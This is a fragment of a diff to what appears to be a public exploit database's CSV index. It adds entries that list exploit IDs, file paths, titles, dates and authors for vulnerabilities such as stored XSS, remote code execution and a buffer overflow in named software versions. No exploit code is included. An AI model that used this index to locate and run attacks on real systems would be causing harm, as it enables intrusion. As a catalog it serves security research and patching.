+49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43896,3 +43898,10 @@ id,file,description,date,author,type,platform,port
 49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php,
 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,
+49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",2021-03-29,m0ze,webapps,php,
+49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",2021-03-29,"Smriti Gaba",webapps,hardware,
+49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",2021-03-29,"Quadron Research Lab",webapps,php,
+49722,exploits/php/webapps/49722.txt,"Equipment Inventory System 1.0 - 'multiple' Stored XSS",2021-03-29,"Jitendra Kumar Tripathi",webapps,php,
+49723,exploits/php/webapps/49723.txt,"Budget Management System 1.0 - 'Budget title' Stored XSS",2021-03-29,"Jitendra Kumar Tripathi",webapps,php,
+49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
+49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
